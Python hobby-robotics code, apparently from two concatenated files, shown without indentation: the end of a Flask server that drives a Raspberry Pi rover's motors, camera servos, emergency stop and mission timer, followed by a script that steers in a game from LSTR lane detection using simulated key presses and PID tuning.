##jwc n config_Global_File.temp = autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_PositionGet_Fn()
##jwc n
# servoCam02Tilt = servoCam02Tilt + 10
# autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_Fn( servoCam02Tilt )
# print("*** DEBUG: S2: servo: tilt: " + str(autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_PositionGet_Fn()))
config_Global_File.servo_02_Tilt_Degrees = config_Global_File.servo_02_Tilt_Degrees + 10
if config_Global_File.servo_02_Tilt_Degrees > 180:
config_Global_File.servo_02_Tilt_Degrees = 180
autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_Fn( config_Global_File.servo_02_Tilt_Degrees )
print("*** DEBUG: S2: servo: tilt: " + str(config_Global_File.servo_02_Tilt_Degrees))
def brakes_on():
config_Global_File.brakes = True
config_Global_File.left_motor = 0
config_Global_File.right_motor = 0
##jwc o io_Driver_File.motor_one_speed(config_Global_File.right_motor)
##jwc o io_Driver_File.motor_two_speed(config_Global_File.left_motor)
# jwc: Motors free to operate: Lo-Level: User-Level
def brakes_off():
config_Global_File.brakes = False
config_Global_File._watchdog_Cycles_SinceLastConnect_Now = 0
def emergencyStop_On_Fn():
config_Global_File.chocks = True
brakes_on()
io_Driver_File.light_red_blink(0.2)
# jwc: Motors free to operate: Hi-Level: Admin-Level ~ Overrides User-Level for Security/Safety
def emergencyStop_Off_Fn():
config_Global_File.chocks = False
brakes_off()
io_Driver_File.light_red_off()
def calculate__timer_Mission_Countdown_Sec__Fn(timer_Duration_MAX_IN, timer_Start_In, timer_Now_In):
return timer_Duration_MAX_IN - (timer_Now_In - timer_Start_In)
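# Worked example (illustrative values): with timer_Duration_MAX_IN = 300,
# timer_Start_In = 1000 and timer_Now_In = 1110 the countdown is
# 300 - (1110 - 1000) = 190 seconds remaining.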
# Functions for clients to access server
#
""" jwc y
# URL for motor control - format: /motor?l=[speed]&r=[speed]
@app_Cl_Ob.route('/motor')
def motor():
left = request.args.get('l')
##o if left and not config_Global_File.chocks:
if left:
left = int(left)
if left >= -100 and left <= 100:
##o config_Global_File.left_motor = left
##o io_Driver_File.motor_two_speed(config_Global_File.left_motor)
left_normalized = (left / 100 )
motor_1.throttle = left_normalized
time.sleep(3)
motor_1.throttle = -1 * left_normalized
time.sleep(3)
motor_1.throttle = 0
time.sleep(3)
servo_1.angle = 90
time.sleep(3)
servo_1.angle = 135
time.sleep(3)
servo_1.angle = 45
time.sleep(3)
print("motor-left: " + str(servoPwm_PositionMax) + " " + str(left_normalized))
return 'ok'
"""
# URL for motor control - format: /motor?l=[speed]&r=[speed]
@app_Cl_Ob.route('/motor')
def motor():
left = request.args.get('l')
right = request.args.get('r')
print("*** *** DEBUG: left: " + str(left) + " right: " + str(right))
left_normalized = 0
right_normalized = 0
if left and not config_Global_File.chocks:
left_Int = int(left)
config_Global_File.left_motor = left_Int
left_Absolute = abs( left_Int )
if left_Int >= -100 and left_Int <= 100:
##jwc yo config_Global_File.left_motor = left
##jwc o io_Driver_File.motor_two_speed(config_Global_File.left_motor)
##jwc o left_normalized = (left / 100 )
if left_Int >= 0:
##jwc y autoPHat_SparkFun_Driver_File.motorLeft_Fn( left_Int )
autoPHat_SparkFun_Driver_File.motorLeft_Fn( (left_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( (left_Int/100) * 250 )
print("*** DEBUG: L1: motor: L " + str((left_Int/100) * 250))
elif left_Int < 0:
##jwc y autoPHat_SparkFun_Driver_File.motorLeft_Fn( left_Int )
autoPHat_SparkFun_Driver_File.motorLeft_Fn( (left_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( (left_Int/100) * 250 )
print("*** DEBUG: L2: motor: L " + str((left_Int/100) * 250))
else:
print("*** Error: Invalid Value: left_Int: ", left_Int)
##jwc o motor_1.throttle = left_normalized
if right and not config_Global_File.chocks:
right_Int = int(right)
config_Global_File.right_motor = right_Int
right_Absolute = abs( right_Int )
if right_Int >= -100 and right_Int <= 100:
##jwc o config_Global_File.right_motor = right
##jwc o io_Driver_File.motor_one_speed(config_Global_File.right_motor)
##jwc o right_normalized = (right / 100 )
if right_Int >= 0:
##jwc y autoPHat_SparkFun_Driver_File.motorRight_Fn( right_Int )
autoPHat_SparkFun_Driver_File.motorRight_Fn( (right_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( -1 * (right_Int/100) * 250 )
print("*** DEBUG: R1: motor: R " + str((right_Int/100) * 250))
elif right_Int < 0:
##jwc y autoPHat_SparkFun_Driver_File.motorRight_Fn( right_Int )
autoPHat_SparkFun_Driver_File.motorRight_Fn( (right_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( -1 * (right_Int/100) * 250 )
print("*** DEBUG: R2: motor: R " + str((right_Int/100) * 250))
else:
print("*** Error: Invalid Value: right_Int: ", right_Int)
##jwc o motor_2.throttle = right_normalized
##jwc y print("*** DEBUG: motor: l" + str(left_normalized) + " r" + str(right_normalized))
##jwc y print("*** DEBUG: motor: l" + str(left_Int) + " r" + str(right_Int)
##jwc yn print("*** DEBUG: motor: l" + str((left_Int/100) * 250) + " r" + str((right_Int/100) * 250))
return 'ok'
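# Note on the scaling above: the UI sends l/r as percentages in [-100, 100] and
# (value/100) * 250 maps that onto the [-250, 250] range handed to
# autoPHat_SparkFun_Driver_File (illustrative: l=40 -> 100, r=-100 -> -250).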
# URL for motor control - format: /motor?l=[speed]&r=[speed]
@app_Cl_Ob.route('/motor_for_turn')
def motor_for_turn():
left = request.args.get('l')
right = request.args.get('r')
print("*** *** DEBUG: left: " + str(left) + " right: " + str(right))
left_normalized = 0
right_normalized = 0
if left and not config_Global_File.chocks:
left_Int = int(left)
config_Global_File.left_motor = left_Int
left_Absolute = abs( left_Int )
if left_Int >= -100 and left_Int <= 100:
##jwc yo config_Global_File.left_motor = left
##jwc o io_Driver_File.motor_two_speed(config_Global_File.left_motor)
##jwc o left_normalized = (left / 100 )
if left_Int >= 0:
##jwc y autoPHat_SparkFun_Driver_File.motorLeft_Fn( left_Int )
autoPHat_SparkFun_Driver_File.motorLeft_Fn( (left_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( (left_Int/100) * 250 )
print("*** DEBUG: L1: motor: L " + str((left_Int/100) * 250))
elif left_Int < 0:
##jwc y autoPHat_SparkFun_Driver_File.motorLeft_Fn( left_Int )
autoPHat_SparkFun_Driver_File.motorLeft_Fn( (left_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( (left_Int/100) * 250 )
print("*** DEBUG: L2: motor: L " + str((left_Int/100) * 250))
else:
print("*** Error: Invalid Value: left_Int: ", left_Int)
##jwc o motor_1.throttle = left_normalized
if right and not config_Global_File.chocks:
right_Int = int(right)
# Since turning, need to invert sign of 'right'
right_Int = -1 * right_Int
config_Global_File.right_motor = right_Int
right_Absolute = abs( right_Int )
if right_Int >= -100 and right_Int <= 100:
##jwc o config_Global_File.right_motor = right
##jwc o io_Driver_File.motor_one_speed(config_Global_File.right_motor)
##jwc o right_normalized = (right / 100 )
if right_Int >= 0:
##jwc y autoPHat_SparkFun_Driver_File.motorRight_Fn( right_Int )
autoPHat_SparkFun_Driver_File.motorRight_Fn( (right_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( -1 * (right_Int/100) * 250 )
print("*** DEBUG: R1: motor: R " + str((right_Int/100) * 250))
elif right_Int < 0:
##jwc y autoPHat_SparkFun_Driver_File.motorRight_Fn( right_Int )
autoPHat_SparkFun_Driver_File.motorRight_Fn( (right_Int/100) * 250 )
##jwc n autoPHat_SparkFun_Driver_File.motorRight_Fn( -1 * (right_Int/100) * 250 )
print("*** DEBUG: R2: motor: R " + str((right_Int/100) * 250))
else:
print("*** Error: Invalid Value: right_Int: ", right_Int)
##jwc o motor_2.throttle = right_normalized
##jwc y print("*** DEBUG: motor: l" + str(left_normalized) + " r" + str(right_normalized))
##jwc y print("*** DEBUG: motor: l" + str(left_Int) + " r" + str(right_Int)
##jwc yn print("*** DEBUG: motor: l" + str((left_Int/100) * 250) + " r" + str((right_Int/100) * 250))
return 'ok'
@app_Cl_Ob.route('/servo_Cam_01_Pan_Degrees_FrontEnd_Fn')
def servo_Cam_01_Pan_Degrees_FrontEnd_Fn():
servoDegreesInt = int(request.args.get('servo_Cam_01_Pan_Degrees_FrontEnd_Id'))
if servoDegreesInt < 0:
servoDegreesInt = 0
elif servoDegreesInt > 180:
servoDegreesInt = 180
config_Global_File.servo_01_Pan_Degrees = servoDegreesInt
autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_Fn( config_Global_File.servo_01_Pan_Degrees )
print("*** DEBUG: /servo_Cam_01_Pan_Degrees_FrontEnd_Fn: " + str(servoDegreesInt))
return 'ok'
@app_Cl_Ob.route('/servo_Cam_02_Tilt_Degrees_FrontEnd_Fn')
def servo_Cam_02_Tilt_Degrees_FrontEnd_Fn():
servoDegreesInt = int(request.args.get('servo_Cam_02_Tilt_Degrees_FrontEnd_Id'))
if servoDegreesInt < 0:
servoDegreesInt = 0
elif servoDegreesInt > 180:
servoDegreesInt = 180
config_Global_File.servo_02_Tilt_Degrees = servoDegreesInt
autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_Fn( config_Global_File.servo_02_Tilt_Degrees )
print("*** DEBUG: /servo_Cam_02_Tilt_Degrees_FrontEnd_Fn: " + str(servoDegreesInt))
return 'ok'
@app_Cl_Ob.route('/servo_Arm_03_Degrees_FrontEnd_Fn')
def servo_Arm_03_Degrees_FrontEnd_Fn():
servoDegreesInt = int(request.args.get('servo_Arm_03_Degrees_FrontEnd_Id'))
if servoDegreesInt < 0:
servoDegreesInt = 0
elif servoDegreesInt > 180:
servoDegreesInt = 180
config_Global_File.servo_03_Degrees = servoDegreesInt
autoPHat_SparkFun_Driver_File.servo_Arm_03_Fn( config_Global_File.servo_03_Degrees )
print("*** DEBUG: /servo_Arm_03_Degrees_FrontEnd_Fn: " + str(servoDegreesInt))
return 'ok'
# URL for motor control - format: /motor?l=[speed]&r=[speed]
@app_Cl_Ob.route('/motorTrim')
def motorTrim():
left = request.args.get('l')
right = request.args.get('r')
print("*** *** DEBUG: motorTrim() Pre : left: " + str(left) + " right: " + str(right))
config_Global_File.left_motor_trim += int( left )
config_Global_File.right_motor_trim += int( right )
DB.write_LeftRight_MotorTrim_Fn(config_Global_File.left_motor_trim, config_Global_File.right_motor_trim)
print("*** *** DEBUG: motorTrim() Post: left: " + str(config_Global_File.left_motor_trim) + " right: " + str(config_Global_File.right_motor_trim))
return 'ok'
# URL for motor control - format: /motor?l=[speed]&r=[speed]
@app_Cl_Ob.route('/heartbeat_Freq_Mod_IncDec_Fn')
def heartbeat_Freq_IncDec_Fn():
incdec = request.args.get('incdec')
print("*** *** DEBUG: heartbeat_Freq_Mod_IncDec_Fn(): incdec: " + str(incdec))
if (config_Global_File.heartbeat_freq + int( incdec )) < 0:
print("*** *** DEBUG: heartbeat_Freq_Mod_IncDec_Fn(): config_Global_File.heartbeat_freq < 0: Invalid")
else:
config_Global_File.heartbeat_freq += int( incdec )
DB.write_Heartbeat_Freq_Fn(config_Global_File.heartbeat_freq)
print("*** *** *** *** DEBUG: heartbeat_Freq_Mod_IncDec_Fn(): config_Global_File.heartbeat_freq >= 0: Valid" )
return 'ok'
@app_Cl_Ob.route('/timer_Mission_Refresh_Fn')
def timer_Mission_Refresh_Fn():
##jwc o incdec = request.args.get('incdec')
config_Global_File._timer_Mission_Start_Sec = int(time.time())
config_Global_File._timer_Mission_Now_Sec = config_Global_File._timer_Mission_Start_Sec
config_Global_File._timer_Mission_Countdown_Sec = config_Global_File._timer_Mission_Duration_MAX_SEC
config_Global_File._timer_Mission_Expired_Bool = False
config_Global_File._timer_Mission_Reserves_Sec_Int = config_Global_File._timer_Mission_Reserves_SEC_MAX_INT
config_Global_File._timer_Mission_Recharge_Sec_Int = 0
config_Global_File._timer_Mission_Recharge_Timestamp_Int = 0
# Clear scores
score_Targeted_Dict.clear()
##jwc y score_Targeted_ClosenessToVideoCenter_Dict.clear()
score_Targeted_WeightedToVideoCenter_Dict.clear()
score_Targeted_WeightedToVideoCenter_TriggerClient_01_Dict.clear()
score_Targeted_WeightedToVideoCenter_TriggerClient_02_Dict.clear()
score_Targeted_WeightedToVideoCenter_TriggerClient_03_Dict.clear()
print("*** *** DEBUG: timer_Mission_Refresh_Fn: ", config_Global_File._timer_Mission_Start_Sec, config_Global_File._timer_Mission_Now_Sec, config_Global_File._timer_Mission_Countdown_Sec, config_Global_File._timer_Mission_Reserves_Sec_Int)
return 'ok'
@app_Cl_Ob.route('/trigger_Client_01_Fn')
def trigger_Client_01_Fn():
##jwc o incdec = request.args.get('incdec')
config_Global_File._trigger_Client_Req_01_Bool = True
print("*** *** DEBUG: trigger_Client_01_Fn: ", config_Global_File._trigger_Client_Req_01_Bool)
return 'ok'
@app_Cl_Ob.route('/trigger_Client_02_Fn')
def trigger_Client_02_Fn():
##jwc o incdec = request.args.get('incdec')
config_Global_File._trigger_Client_Req_02_Bool = True
print("*** *** DEBUG: trigger_Client_02_Fn: ", config_Global_File._trigger_Client_Req_02_Bool)
return 'ok'
@app_Cl_Ob.route('/trigger_Client_03_Fn')
def trigger_Client_03_Fn():
##jwc o incdec = request.args.get('incdec')
config_Global_File._trigger_Client_Req_03_Bool = True
print("*** *** DEBUG: trigger_Client_03_Fn: ", config_Global_File._trigger_Client_Req_03_Bool)
return 'ok'
""" jwc o
# URL for joystick input - format: /joystick?x=[x-axis]&y=[y-axis]
@app_Cl_Ob.route('/joystick')
def joystick():
config_Global_File._watchdog_Cycles_SinceLastConnect_Now = 0
x_axis = int(request.args.get('x'))
y_axis = int(request.args.get('y'))
x_axis = -1 * max( min(x_axis, 100), -100)
y_axis = max( min(y_axis, 100), -100)
v = (100-abs(x_axis)) * (y_axis/100) + y_axis
w = (100-abs(y_axis)) * (x_axis/100) + x_axis
r = int((v+w) / 2)
l = int((v-w) / 2)
if not config_Global_File.chocks:
config_Global_File.right_motor = r
config_Global_File.left_motor = l
io_Driver_File.motor_one_speed(config_Global_File.right_motor)
io_Driver_File.motor_two_speed(config_Global_File.left_motor)
return 'ok'
"""
# URL to remote control touchpads 1-4 on explorer-hat
@app_Cl_Ob.route('/touchpad')
def touchpad():
pad = request.args.get('pad')
if pad:
touch_handler(int(pad), True)
return 'ok'
# URL for heartbeat requests (resets watchdog timer)
# Returns JSON object with status data
@app_Cl_Ob.route('/heartbeat')
def heartbeat():
config_Global_File._watchdog_Cycles_SinceLastConnect_Now = 0
output = {}
output['b'] = config_Global_File.blue
output['y'] = config_Global_File.yellow
output['c'] = config_Global_File.chocks
output['g'] = config_Global_File.green
output['f'] = config_Global_File.video_fps
output['v'] = config_Global_File.video_status
output['l'] = config_Global_File.left_motor
##jwc o output['l'] = motor_1.throttle
output['r'] = config_Global_File.right_motor
##jwc o output['r'] = motor_2.throttle
# jwc
#
output['lt'] = config_Global_File.left_motor_trim
output['rt'] = config_Global_File.right_motor_trim
output['hf'] = config_Global_File.heartbeat_freq
output['s1'] = config_Global_File.servo_01_Pan_Degrees
output['s2'] = config_Global_File.servo_02_Tilt_Degrees
output['s3'] = config_Global_File.servo_03_Degrees
output['s4'] = config_Global_File.servo_04_Degrees
output['i1'] = io_Driver_File.input_one_read()
output['i2'] = io_Driver_File.input_two_read()
output['i3'] = io_Driver_File.input_three_read()
output['i4'] = io_Driver_File.input_four_read()
##jwc o output['a1'] = io_Driver_File.analog_one_read()
##jwc o output['a2'] = io_Driver_File.analog_two_read()
##jwc o output['a3'] = io_Driver_File.analog_three_read()
##jwc o output['a4'] = io_Driver_File.analog_four_read()
output['sc'] = str( score_Targeted_Dict )
##jwc y output['sctc'] = str( score_Targeted_ClosenessToVideoCenter_Dict )
output['sctw'] = str( score_Targeted_WeightedToVideoCenter_Dict )
output['sctwtc1'] = str( score_Targeted_WeightedToVideoCenter_TriggerClient_01_Dict )
output['sctwtc2'] = str( score_Targeted_WeightedToVideoCenter_TriggerClient_02_Dict )
output['sctwtc3'] = str( score_Targeted_WeightedToVideoCenter_TriggerClient_03_Dict )
## jwc replace w/ PiUpTimeUps: batteryUps_Read_Fn( config_Global_File )
##jwc n get_VoltageAndTemp_Status_Fn( config_Global_File )
piUpTimeUps_2pt0__AlchemyPower.get_VoltageAndTemp_Status_Fn( config_Global_File )
output['bvi'] = f'{config_Global_File._batteryUps_Input_V:.2f}'
output['bvo'] = f'{config_Global_File._batteryUps_Output_V:.2f}'
output['bvb'] = f'{config_Global_File._batteryUps_Battery_V:.2f}'
output['btc'] = f'{config_Global_File._batteryUps_Temp_C:5.2f}C'
output['btf'] = f'{config_Global_File._batteryUps_Temp_F:5.2f}F'
config_Global_File._timer_Mission_Now_Sec = int(time.time())
##jwc y config_Global_File._timer_Mission_Countdown_Sec = config_Global_File._timer_Mission_Duration_MAX_SEC - (config_Global_File._timer_Mission_Now_Sec - config_Global_File._timer_Mission_Start_Sec)
config_Global_File._timer_Mission_Countdown_Sec = calculate__timer_Mission_Countdown_Sec__Fn( config_Global_File._timer_Mission_Duration_MAX_SEC, config_Global_File._timer_Mission_Start_Sec, config_Global_File._timer_Mission_Now_Sec)
if(config_Global_File._timer_Mission_Countdown_Sec < 0):
config_Global_File._timer_Mission_Countdown_Sec = 0
config_Global_File._timer_Mission_Expired_Bool = True
output['tmc'] = config_Global_File._timer_Mission_Countdown_Sec
output['tme'] = config_Global_File._timer_Mission_Expired_Bool
output['tmr'] = config_Global_File._timer_Mission_Reserves_Sec_Int
output['tmres'] = config_Global_File._timer_Mission_Recharge_Sec_Int
output['tmreth'] = config_Global_File._timer_Mission_Recharge_THRESHOLD_DEC
output['tmn'] = config_Global_File._timer_Mission_Now_Sec
output['tmreti'] = config_Global_File._timer_Mission_Recharge_Timestamp_Int
##jwc n if(config_Global_File._timer_Mission_Recharge_Sec_Int > 0):
##jwc n # Reset only upon the above condition
##jwc n config_Global_File._timer_Mission_Recharge_Sec_Int = 0
print("*** *** *** DEBUG: timer_Mission: ", config_Global_File._timer_Mission_Now_Sec, config_Global_File._timer_Mission_Start_Sec, config_Global_File._timer_Mission_Countdown_Sec)
return json.dumps(output)
if __name__ == '__main__':
print("*** DEBUG: __main__")
# jwc 2020-1223 StreamVideoToWebBrowser-AdrianRosebrock
#
# construct the argument parser and parse command line arguments
argumentParser_Cl_Ob = argparse.ArgumentParser()
##jwc y argumentParser_Cl_Ob.add_argument("-i", "--ip", type=str, required=True,help="ip address of the device")
argumentParser_Cl_Ob.add_argument("-a", "--address", type=str, default='0.0.0.0', help="ip address of the device")
##jwc y argumentParser_Cl_Ob.add_argument("-o", "--port", type=int, required=True, help="ephemeral port number of the server (1024 to 65535)")
argumentParser_Cl_Ob.add_argument("-p", "--port", type=int, default=5000, help="ephemeral port number of the server (1024 to 65535)")
argumentParser_Cl_Ob.add_argument("-f", "--frame-count", type=int, default=32, help="# of frames used to construct the background model")
# jwc 2.1
##jwc o argumentParser_Cl_Ob.add_argument("-thread_Cl_Ob", "--type", type=str, default="DICT_ARUCO_ORIGINAL", help="type of ArUCo tag to detect")
##jwc type error '-thread_Cl_Ob': argumentParser_Cl_Ob.add_argument("-thread_Cl_Ob", "--type", type=str, default="DICT_6X6_100", help="type of ArUCo tag to detect")
argumentParser_Cl_Ob.add_argument("-t", "--type", type=str, default="DICT_6X6_100", help="type of ArUCo tag to detect")
print("*** DEBUG: __main__: --type (default): cv2.aruco.DICT_6X6_100")
args = vars(argumentParser_Cl_Ob.parse_args())
# verify that the supplied ArUCo tag exists and is supported by
# OpenCV
if ARUCO_DICT.get(args["type"], None) is None:
print("[INFO] ArUCo tag of '{}' is not supported".format(
args["type"]))
sys.exit(0)
# load the ArUCo dictionary and grab the ArUCo parameters
print("[INFO] detecting '{}' tags...".format(args["type"]))
arucoDict = cv2.aruco.Dictionary_get(ARUCO_DICT[args["type"]])
arucoParams = cv2.aruco.DetectorParameters_create()
io_Driver_File.light_green_blink(0.1)
time.sleep(1)
io_Driver_File.light_green_off()
# register signal handler for a clean exit
signal.signal(signal.SIGINT, signal_handler)
##jwc o # register handler for touchpads
##jwc o if io_Driver_File.explorerhat:
##jwc o io_Driver_File.xhat.touch.released(touch_handler)
# prepare and start watchdog
    # jwc: the watchdog fires so often (it looks like an infinite, recursive loop) and interferes with debugging, so consider disabling it while debugging
#
watchDog = threading.Thread(name='watchdog_timer', target=watchdog_timer)
watchDog.start()
# jwc 2020-1223 StreamVideoToWebBrowser-AdrianRosebrock
#
# start a thread that will perform motion detection
##jwc o AiCam 2.0 thread_Cl_Ob = threading.Thread(target=detect_Motions_ARCHIVED_Fn, args=(args["frame_count"],))
##jwc AiCam 2.1
##
thread_Cl_Ob = threading.Thread(target=detect_Motions_And_ArucoMarkers_Fn, args=(args["frame_count"],))
thread_Cl_Ob.daemon = True
thread_Cl_Ob.start()
    # Server selection history (earlier attempts kept for reference):
    # * Flask's built-in development server (app_Cl_Ob.run) was tried on ports 80,
    #   5000, 5001 (to avoid conflicting with other apps) and 8888, with various
    #   debug / threaded / use_reloader / passthrough_errors combinations, e.g.:
    ##jwc yy app_Cl_Ob.run(host=args["address"], port=args["port"], debug=True, threaded=True, use_reloader=False, passthrough_errors=True)
    #   debug=True seemed to crash the RPi and break the video stream, and the external
    #   VSCode debugger is now used instead of the Flask debugger, so the Flask
    #   development server is no longer started here.
    # * WSGI server: Gunicorn was also tried.
    # * WSGI server: Waitress (current choice). The default of 4 threads caused queueing
    #   issues once a 2nd/3rd browser client connected; the thread count was raised
    #   from 6 to 100.
serve( app_Cl_Ob, host='0.0.0.0', port=5000, url_scheme='https', threads=100 )
# * Gevent
##jwc y? http_server = WSGIServer(('', 5000), app_Cl_Ob)
##jwc y? http_server.serve_forever()
# jwc 2020-1223 StreamVideoToWebBrowser-AdrianRosebrock
#
# release the video stream pointer
videoStream_Cl_Ob.stop()
|
autodrive.py
|
import argparse
import importlib
import json
import math
import os
import pprint
import sys
import threading
from copy import deepcopy
from time import sleep, time
import cv2
import matplotlib.pyplot as plt
import numpy as np
import torch
import torch.nn.functional as F
import win32gui
from PIL import Image, ImageGrab
from pynput import keyboard
from pynput.mouse import Button, Controller, Listener
from torch import nn
from config import system_configs
from keys import Keys
from nnet.py_factory import NetworkFactory
from utils import normalize_
from simple_pid import PID
torch.backends.cudnn.benchmark = False
SPEED = 10
GREEN = [0, 255, 0]
WHITE = [255, 255, 255]
RED = [0, 0, 255]
ORANGE = [0, 127, 255]
ctr = Keys()
SHUTDOWN = False
AUTOMODE = False
# XX, YY, ZZ = 0.0005, 0, 0
XX, YY, ZZ = 0, 0, 0
XX, YY, ZZ = 1e-6, 1e-7, 3e-6
KP, KI, KD = 0.000001, 0.0000001, 0.0000001
NEW_PID = True
def stop():
global SPEED
ctr.directKey('s')
sleep(0.01*SPEED+0.3)
ctr.directKey('s', ctr.key_release)
def steer(dx):
global ctr, SPEED
# dx = dx*SPEED
# ctr.directMouse(ctr.mouse_lb_release)
# ctr.directMouse(ctr.mouse_lb_press)
# dx = np.floor(dx).astype(np.int32)
print(np.abs(dx))
# sleep(0.1)
# ctr.directMouse(-dx, 0)
if -dx<0:
ctr.directKey('a')
sleep(np.abs(dx))
ctr.directKey('a', ctr.key_release)
if -dx>0:
ctr.directKey('d')
sleep(np.abs(dx))
ctr.directKey('d', ctr.key_release)
def delay_process(msg, param=()):
func = None
if msg=='stop':
func = stop
if msg=='steer':
func = steer
if func!=None:
t = threading.Thread(target=func, args=param)
t.start()
def PostProcess(outputs, target_sizes):
out_logits, out_curves = outputs['pred_logits'], outputs['pred_curves']
assert len(out_logits) == len(target_sizes)
assert target_sizes.shape[1] == 2
prob = F.softmax(out_logits, -1)
_, labels = prob.max(-1)
labels[labels != 1] = 0
results = torch.cat([labels.unsqueeze(-1).float(), out_curves], dim=-1)
return results
def get_lane_model():
input_size = [360, 640]
mean = np.array([0.40789654, 0.44719302, 0.47026115], dtype=np.float32)
std = np.array([0.28863828, 0.27408164, 0.27809835], dtype=np.float32)
with open('config\\LSTR.json', "r") as f:
configs = json.load(f)
configs["system"]["snapshot_name"] = 'LSTR'
system_configs.update_config(configs["system"])
nnet = NetworkFactory()
with open('cache\\nnet\\LSTR\\LSTR_500000.pkl', "rb") as f:
params = torch.load(f)
model_dict = nnet.model.state_dict()
if len(params) != len(model_dict):
pretrained_dict = {k: v for k, v in params.items() if k in model_dict}
else:
pretrained_dict = params
model_dict.update(pretrained_dict)
nnet.model.load_state_dict(model_dict)
nnet.cuda()
nnet.eval_mode()
return nnet, input_size, mean, std
def lane_detection(ori_image, mean, std, input_size, nnet, point=True):
image = cv2.cvtColor(ori_image, cv2.COLOR_BGR2RGB)
height, width = image.shape[0:2]
images = np.zeros((1, 3, input_size[0], input_size[1]), dtype=np.float32)
masks = np.ones((1, 1, input_size[0], input_size[1]), dtype=np.float32)
orig_target_sizes = torch.tensor(input_size).unsqueeze(0).cuda()
pad_image = image.copy()
pad_mask = np.zeros((height, width, 1), dtype=np.float32)
resized_image = cv2.resize(pad_image, (input_size[1], input_size[0]))
resized_mask = cv2.resize(pad_mask, (input_size[1], input_size[0]))
masks[0][0] = resized_mask.squeeze()
resized_image = resized_image / 255.
normalize_(resized_image, mean, std)
resized_image = resized_image.transpose(2, 0, 1)
images[0] = resized_image
images = torch.from_numpy(images).cuda(non_blocking=True)
masks = torch.from_numpy(masks).cuda(non_blocking=True)
torch.cuda.synchronize(0) # 0 is the GPU id
outputs, _ = nnet.test([images, masks])
torch.cuda.synchronize(0) # 0 is the GPU id
results = PostProcess(outputs, orig_target_sizes)
pred = results[0].cpu().numpy()
img = pad_image
img_h, img_w, _ = img.shape
pred = pred[pred[:, 0].astype(int) == 1]
# overlay = np.zeros_like(img, np.uint8)
overlay_rgb = img.copy()
point_xy = []
for i, lane in enumerate(pred):
lane = lane[1:] # remove conf
lower, upper = lane[0], lane[1]
lane = lane[2:] # remove upper, lower positions
# generate points from the polynomial
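        # The x coordinate is evaluated from the predicted curve coefficients as
        # a/(y-b)**2 + c/(y-b) + d + e*y - f (this matches LSTR's curve
        # parameterization) and then scaled by the image width; points that fall
        # outside the image are dropped just below.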
ys = np.linspace(lower, upper, num=100)
points = np.zeros((len(ys), 2), dtype=np.int32)
points[:, 1] = (ys * img_h).astype(int)
points[:, 0] = ((lane[0] / (ys - lane[1]) ** 2 + lane[2] / (ys - lane[1]) + lane[3] + lane[4] * ys -
lane[5]) * img_w).astype(int)
points = points[(points[:, 0] > 0) & (points[:, 0] < img_w)]
point_xy.append(points)
if point:
for xxx, yyy in points:
# cv2.circle(overlay, (xxx, yyy), 1, color=WHITE, thickness=1)
cv2.circle(overlay_rgb, (xxx, yyy), 1, color=GREEN, thickness=1)
else:
for current_point, next_point in zip(points[:-1], points[1:]):
# overlay = cv2.line(overlay, tuple(current_point), tuple(next_point), color=WHITE, thickness=1)
overlay_rgb = cv2.line(overlay_rgb, tuple(current_point), tuple(next_point), color=GREEN, thickness=1)
return overlay_rgb, point_xy
def transform_point(pointxy, M):
result = []
for lanes in pointxy:
ps = lanes.shape[0]
pad = np.ones((ps,1), dtype=lanes.dtype)
pad = np.concatenate([lanes, pad], axis=1)
res = np.matmul(pad, M.T)
result.append(np.floor(res[:,:2]/res[:,-1][:, np.newaxis]).astype(np.int32))
return result
def on_press(key):
global AUTOMODE, SHUTDOWN, XX, YY, ZZ, KP, KI, KD, NEW_PID
try:
if key.vk==96+7:
XX-=KP
print("XX{} YY{} ZZ{}".format(XX, YY, ZZ))
if key.vk==96+9:
XX+=KP
print("XX{} YY{} ZZ{}".format(XX, YY, ZZ))
if key.vk==96+4:
YY-=KI
print("XX{} YY{} ZZ{}".format(XX, YY, ZZ))
if key.vk==96+6:
YY+=KI
print("XX{} YY{} ZZ{}".format(XX, YY, ZZ))
if key.vk==96+1:
ZZ-=KD
print("XX{} YY{} ZZ{}".format(XX, YY, ZZ))
if key.vk==96+3:
ZZ+=KD
print("XX{} YY{} ZZ{}".format(XX, YY, ZZ))
except AttributeError:
pass
def on_release(key):
global AUTOMODE, SHUTDOWN, XX, YY, ZZ, KP, KI, KD, NEW_PID
try:
if key.char=='=': # auto drive on-off
if AUTOMODE:
AUTOMODE = False
print('Automode end!')
ctr.directKey('w', ctr.key_release)
delay_process('stop')
else:
AUTOMODE = True
print('Automode start!')
ctr.directMouse(buttons=ctr.mouse_lb_press)
ctr.directMouse(buttons=ctr.mouse_lb_release)
ctr.directKey('w')
# if key.char=='-':
# ctr.directMouse(buttons=ctr.mouse_lb_release)
# ctr.directKey('w', ctr.key_release)
# SHUTDOWN=True
# return False
if key.vk==96+5:
NEW_PID=True
except AttributeError:
pass
def main():
global SHUTDOWN, AUTOMODE, NEW_PID, XX, YY, ZZ
nnet, input_size, mean, std = get_lane_model()
bbox = (40,119,840,719)
keyboard_listener = keyboard.Listener(
on_release=on_release,
on_press=on_press
)
keyboard_listener.start()
while(True):
if NEW_PID:
pid=PID(XX, YY, ZZ, 400)
pid.output_limits = (-1, 1)
NEW_PID=False
print('set new PID({},{},{})'.format(XX, YY, ZZ))
last_time = time()
image = np.array(ImageGrab.grab(bbox=bbox))
mix, points_xy = lane_detection(image, mean, std, input_size, nnet, True)
        # source points in the original frame (pts_o) and destination points (pts_d) for the bird's-eye perspective warp
pts_o = np.float32([[0, 200], [0, 600], [800, 600], [800, 200]])
pts_d = np.float32([[0, 0], [346, 400], [454, 400], [800, 0]])
M = cv2.getPerspectiveTransform(pts_o, pts_d)
black_bg = np.zeros((400, 800, 3), dtype=np.float32)
